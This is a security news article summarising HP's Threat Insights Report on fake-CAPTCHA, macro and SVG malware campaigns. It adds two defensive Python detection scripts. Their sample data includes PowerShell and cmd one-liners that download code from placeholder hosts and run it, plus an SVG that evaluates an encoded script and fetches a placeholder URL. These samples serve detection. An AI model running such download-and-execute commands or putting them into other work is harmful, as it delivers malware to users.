HP Inc. has released its latest Threat Insights Report, warning that cybercriminals are increasingly using fake CAPTCHA tests to trick users into installing malware. The lure works by exploiting what the researchers call “click tolerance”: the habit users build from routinely clicking through multi-step verification and authentication prompts without questioning them.
The findings, presented at HP’s annual Amplify Conference, are drawn from telemetry on millions of endpoints protected by HP Wolf Security between October and December 2024. The report singles out a campaign it dubs “CAPTCHA Me If You Can”: attackers steered victims to malicious websites where a fake CAPTCHA verification screen walked them through running a PowerShell command on their own machine. That command quietly installed Lumma Stealer, an information-stealing malware family (an infostealer, not a remote access trojan), on the system.
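The fake-CAPTCHA chain leaves a characteristic trace on the endpoint: a script host such as PowerShell or mshta spawned by the desktop shell (the Run dialog runs under explorer.exe) with a command line that hides its window, disables script policy, fetches a second stage over HTTP and runs it in memory. The following is an added detection sketch, not code from HP or the report; the event records are constructed to resemble process-creation fields (parent image, image, command line) and the URLs are placeholders.

```python
"""Flag process-creation events that match the fake-CAPTCHA "paste this into Run" pattern.

Added example, not HP's or the report's code. Events are constructed samples shaped like
Sysmon Event ID 1 / Windows 4688 fields; example.invalid hosts are placeholders.
"""
import ntpath
import re

# Script hosts a pasted one-liner usually lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Hosts that fetch and run remote content by themselves, with no switches to look for.
REMOTE_LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line markers typical of a pasted one-liner.
MARKERS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b", re.I),
    "in_memory_exec":  re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url":      re.compile(r"https?://", re.I),
}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/v.txt' -UseBasicParsing)\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoExit Get-Process"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c curl https://example.invalid/x.txt -o %temp%\x.ps1 && powershell -ep bypass -f %temp%\x.ps1"},
]


def reasons_for(event):
    """Return the list of markers hit, or [] when the parent/child shape does not fit."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    # The Run dialog (Win+R) launches under explorer.exe; other parents are out of scope here.
    if parent != "explorer.exe" or image not in SCRIPT_HOSTS:
        return []
    hits = [name for name, rx in MARKERS.items() if rx.search(event["cmdline"])]
    # mshta/wscript/cscript given a URL is itself a cradle, even with no other switches.
    if image in REMOTE_LOLBINS and "remote_url" in hits:
        hits.append("lolbin_with_remote_url")
    return hits


def is_clickfix_like(event):
    """Require two independent markers so an admin typing 'powershell' into Run is not flagged."""
    return len(reasons_for(event)) >= 2


def scan(events):
    """Return (index, reasons) for every event that matches."""
    return [(i, reasons_for(e)) for i, e in enumerate(events) if is_clickfix_like(e)]


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:60], "->", why)
```

The two-marker threshold is the practitioner's caveat: parent-of-explorer alone is noisy, and a lone URL in a command line is common, but a hidden window plus a download cradle under the shell is rarely legitimate. Pair this with a review of the RunMRU registry history and clipboard-aware endpoint telemetry if the platform exposes them.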
HP Wolf Security researchers also flagged the spread of XenoRAT, an open-source remote access trojan with surveillance features including webcam and microphone capture. Here the initial access was conventional social engineering: victims were persuaded to enable macros in Word and Excel documents, after which the trojan gave attackers keystroke logging, data theft and remote control of the device.
Another campaign in the report embedded malicious JavaScript inside Scalable Vector Graphics (SVG) image files. SVG files open in the default web browser when launched, so the script inside the seemingly harmless image ran and installed multiple payloads, including infostealers and several RATs. The chain also relied on evasion techniques such as heavily obfuscated Python scripts, a choice that blends in on machines where Python is already installed for AI and data science work.
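An SVG is XML, so the active content the campaign above relies on is easy to enumerate: <script> elements, on* event-handler attributes, javascript: URLs in href/xlink:href, and <foreignObject> HTML islands. The following is an added example, not HP's or the report's code; the three SVG documents are constructed here, and the base64 payload in the second one decodes to a harmless one-liner standing in for a real second stage.

```python
"""Enumerate script-capable constructs in an SVG file before letting it near a browser.

Added example, not from HP or the report. Sample SVGs are constructed; the payload is benign.
"""
import base64
import xml.etree.ElementTree as ET

# Constructed sample: a plain image with no active content.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="green"/>
</svg>"""

# Constructed sample in the style described above: a decoy image plus a <script> that
# decodes and evaluates a hidden stage when the file is opened in a browser.
_payload = base64.b64encode(b"document.title='decoded stage 2'").decode()
SCRIPT_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="20">Loading document...</text>
  <script type="text/javascript"><![CDATA[
    eval(atob("{_payload}"));
  ]]></script>
</svg>"""

# Constructed sample: no <script> element, but an event handler and a javascript: link.
HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="fetch('https://example.invalid/x')">
  <a xlink:href="javascript:alert(1)"><rect width="5" height="5"/></a>
</svg>"""


def _local(name):
    """Strip an XML namespace ({uri}local) so svg: and xlink: names compare by local part."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_text):
    """Return (element, detail) pairs for each script-capable construct, in document order.

    An empty list means none of these constructs was found; it is not proof the file is safe.
    """
    findings = []
    # For untrusted input in production, parse with defusedxml rather than the stdlib parser.
    root = ET.fromstring(svg_text)
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":
            body = (elem.text or "").strip()
            findings.append((tag, f"inline script, {len(body)} bytes"))
        elif tag == "foreignobject":
            findings.append((tag, "embedded HTML island"))
        for attr, value in elem.attrib.items():
            a = _local(attr)
            if a.startswith("on"):
                findings.append((tag, f"event handler {a}"))
            elif a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append((tag, "javascript: URL in href"))
    return findings


def has_active_content(svg_text):
    """True when the SVG carries anything a browser would execute."""
    return bool(svg_findings(svg_text))


if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_SVG), ("script", SCRIPT_SVG), ("handler", HANDLER_SVG)]:
        print(name, svg_findings(doc))
```

A mail gateway or file-share scanner can refuse or sandbox any SVG where has_active_content() is true; images that merely draw shapes never need these constructs. The check is deliberately structural rather than signature-based, so obfuscating the JavaScript (as the campaign did with its Python stages) does not help the attacker get past it.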
According to Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, a recurring theme across these campaigns is the use of obfuscation and anti-analysis techniques. They slow down analysis and hide what the malware is doing, which stretches the time attackers can operate before defenders respond.
HP Wolf Security gains this visibility by opening risky content inside isolated virtual containers, where it can run and be observed without reaching the host. HP reports that customers protected this way have opened more than 65 billion email attachments, web pages and files without a reported breach or successful infection.
The report also points to gaps in perimeter defenses: roughly 11% of the malicious emails caught by HP Sure Click had already passed at least one email gateway scanner. Executable files remain the most common delivery vehicle, accounting for 43% of identified threats, followed by archive files at 32%.
Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc., emphasized that the proliferation of multi-step authentication has increased people’s tolerance for complex, multi-click processes, making cyber-awareness training noticeably insufficient. He recommended that organizations focus on reducing their overall attack surface by isolating potentially dangerous operations, rather than relying solely on prediction and user vigilance.
As threats evolve and AI-driven attack methods emerge, HP advises businesses to proactively implement secure isolation strategies, enhancing preventative security measures and safeguarding systems from unpredictable cyber threats.